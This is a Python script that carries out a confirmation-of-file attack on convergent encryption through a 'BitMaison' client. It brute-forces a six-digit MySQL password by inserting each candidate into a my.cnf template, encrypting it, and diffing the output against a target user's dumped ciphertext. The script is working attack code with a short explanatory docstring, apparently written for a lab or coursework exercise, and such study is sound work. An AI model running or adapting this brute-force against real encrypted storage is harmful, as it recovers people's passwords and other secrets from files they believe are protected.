#!/usr/bin/env python

import os.path
import pdb
from itertools import izip
from subprocess import call
from BitMaison.BMClient import BMClient

class PartialInformationAttack:
    """
    Convergent Encryption vulnerability.
    When an encrypted file has a format and someone else knows what kind of
    format is there is slight chance to send multiple if not several encrypted
    files to see which one matches. There is no way, at least not on short term
    to break AES, but there is a way to create several files
    and try to match it
    e.g taken from https://en.wikipedia.org/wiki/Convergent_encryption

    For example, if the defender encrypts a bank form including a ten digit
    bank account number, an attacker that is aware of generic bank form format
    may extract defender's bank account number by producing bank forms for
    all possible bank account numbers, encrypt them and then by comparing
    those encryptions with defender's encrypted file deduce his bank account 
    number.
    """
    bmclient = BMClient()


    def __init__(self):

        data_file_ciphered = ""
        # Numbers list generated by crunch, raning from 0-9, with a length 
        # of 6 digits
        generated_nums_path = os.path.abspath('./nums.lst')

        # plain_text_path = os.path.abspath("my.cnf_template")

        # Ciphertext to find its match: Breaking the "cipher"
        # test_case_ciphertext = os.path.abspath("../dump/tglover/my.cnf_template")
        # Ciphertext to find its match: Breaking the "cipher"
        test_case_ciphertext = os.path.abspath("../dump/pjames/my.cnf")
        keys = []

        with open(generated_nums_path, 'r') as data_nums:
            for data in data_nums:
                data_file_modified = self.modify_file(data.split()[0])

                keys = self.get_cipher_keys(data_file_modified)
                data_file_ciphered = self.save_key_file(keys[0])
                flag = self.compare_files_diff(data_file_ciphered, test_case_ciphertext)
                if flag:
                    break
                else:
                    continue

    def compare_files_diff(self, file_1, file_2):
        """
        Fn to compare files, this files are encrypted ones,
        one is the generated and the other one the target.
        Args:
            file_1[file]    : File generated
            file_2[file]    : Target file

        Returns:
            False: When there is no match
            True: When it finds a match
        """
        flag = call(["diff", file_1, file_2])
        if flag == 1:
            print "Nope"
            return False
        else:
            print "Equal"
            return True

    def compare_files(self, file_1, file_2):
        """
        Same function as above, but i think this is more prone
        to errors or missmatching, althoug the result were good

        Args:
            file_1[file]    : File generated
            file_2[file]    : Target file

        Returns:
            False: When there is no match
            True: When it finds a match

        """
        flag = call(["diff", file_1, file_2])
        if flag == 1:
            print "Not equal"
        else:
            print "Equal"
            return True
        with open(file_1, 'r') as data_1, open(file_2, 'r') as data_2:

            for line_1, line_2 in izip(data_1, data_2):
                files_are_equal = True

                if len(line_1) == len(line_2):

                    for i, item in enumerate(line_1):

                        if item != line_2[i]:
                            files_are_equal = False
                            break
                else:
                    files_are_equal = False
                    print "The files are not equal, len"
                    break
            if files_are_equal:
                print "The files are equal"
                print file_1
                return True
            else:
                return False


    def modify_file(self, data):
        """
        Fn to modify the plain text file that will be compared
        against the target

        Args:
            data(str)       : A 6-digit combination of numbers

        Returns:
            plain_text_path[file]   : The modified file
        """
        plain_text_path = os.path.abspath("my.cnf_template")
        with open(plain_text_path, 'r') as data_file:
            data_line = data_file.readlines()

        data_line[18] = 'password = {0}\n'.format(data)

        with open(plain_text_path, 'w') as data_file:
            data_file.writelines(data_line)
            data_file.close()

        return plain_text_path

    def get_cipher_keys(self, plain_text_path):
        """
        Fn to cipher the file received as argument, using the BMClient module

        Args:
            plain_text_path[file]       : file to cipher

        Returns:
            A pair of keys,
            [0] = ciphered file
            [1] = Master key  ---- not needed
        """
        ret, value = self.bmclient.cipher_file(plain_text_path)
        if ret:
            return [value[0], value[1]]

    def save_key_file(self, data):
        """
        Fn to write the output of the ciphered file on a file

        Args:
            data[file]      : Ciphered content

        Returns:
            The path of the file created
        """
        cipher_text_file = "cipher.cnf"
        if not os.path.isfile(cipher_text_file):
            cipher_text_file = open(cipher_text_file, 'w+')

        with open(cipher_text_file, 'w') as cipher_file:
            cipher_file.write(data)
            cipher_file.close()

        print "CIPHER FILE CREATED AT: {0}".format(cipher_text_file)

        return cipher_text_file

PartialInformationAttack()
